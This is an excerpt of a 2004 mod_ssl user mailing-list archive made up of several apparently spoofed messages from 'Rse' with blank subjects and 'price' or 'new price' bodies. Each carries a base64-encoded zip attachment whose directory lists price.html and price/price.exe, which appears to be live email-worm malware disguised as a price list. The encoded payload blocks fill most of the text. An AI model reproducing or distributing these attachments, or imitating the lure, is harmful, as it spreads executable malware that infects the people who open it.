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

----------qnnmvqoanxxjyxomowkw--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 22:12:34 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2F900A8945; Mon,  9 Aug 2004 22:12:34 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Yogi.org (roc-66-67-102-103.rochester.rr.com [66.67.102.103])
	by master.modssl.org (Postfix) with SMTP id 4E36FA893A
	for ; Mon,  9 Aug 2004 22:12:26 +0200 (CEST)
Date: Mon, 09 Aug 2004 16:12:19 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------szuxoxljxkgigykocmai"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------szuxoxljxkgigykocmai
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


 price







----------szuxoxljxkgigykocmai
Content-Type: application/octet-stream; name="newprice.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="newprice.zip"

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

----------szuxoxljxkgigykocmai--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Aug  9 22:13:23 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 637EFA8D1A; Mon,  9 Aug 2004 22:13:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from elainecomputer.net (rrcs-nys-24-213-243-113.biz.rr.com [24.213.243.113])
	by master.modssl.org (Postfix) with SMTP id 81E62A8D12
	for ; Mon,  9 Aug 2004 22:13:22 +0200 (CEST)
Date: Mon, 09 Aug 2004 16:08:55 -0500
To: "Modssl-users" 
From: "Rse" 
Subject:  
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------djpvkenkbvlnunydyzkx"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------djpvkenkbvlnunydyzkx
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


new price







----------djpvkenkbvlnunydyzkx
Content-Type: application/octet-stream; name="price2.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="price2.zip"

UEsDBBQAAAAIANSBCTE3Aq1SCQIAAD4EAAAKAAAAcHJpY2UuaHRtbI1U34+aQBB+v+T+hzke
Ds0V8EfTMxVMLFJj43HNqfWxGZcRt8GFLKte0vi/d1F6LUqa7gNhZ+b7vplhBndDGA1ub9yc
SZ4pSFDEO4zJM77gHmcno6H9e5RAr5Sh2nhmJjkj5/S0tdHsa7xzJtCh+jLzXyZf5zAdhuPF
cBxckrl3lnWmXAnckidwz2NUqbQxy0Jt0YQ5HSSBB4bMaWL0y/A9SS/DwiRUowL7RjLnqWj2
iwTWO8GUvgEXucIkaTTh5+0NlIevoQF/wFmCap3KLdzf11nvPDCXXHQ7JlRYfp8kZVho2ZI0
hlHDDJ/ny0nY7SyHL+EkHNsbtU3MIrFLqCS1k+Ivx7Ga5Kk74OkEnjiTaZ6uFejCSQpSELxm
SSpJmkXeRWNg4EGnNsUoZbstCWUfJFc6QTdd/SCmgEeeEfOVAQce6e/ahg3xeKP0C0swzwu3
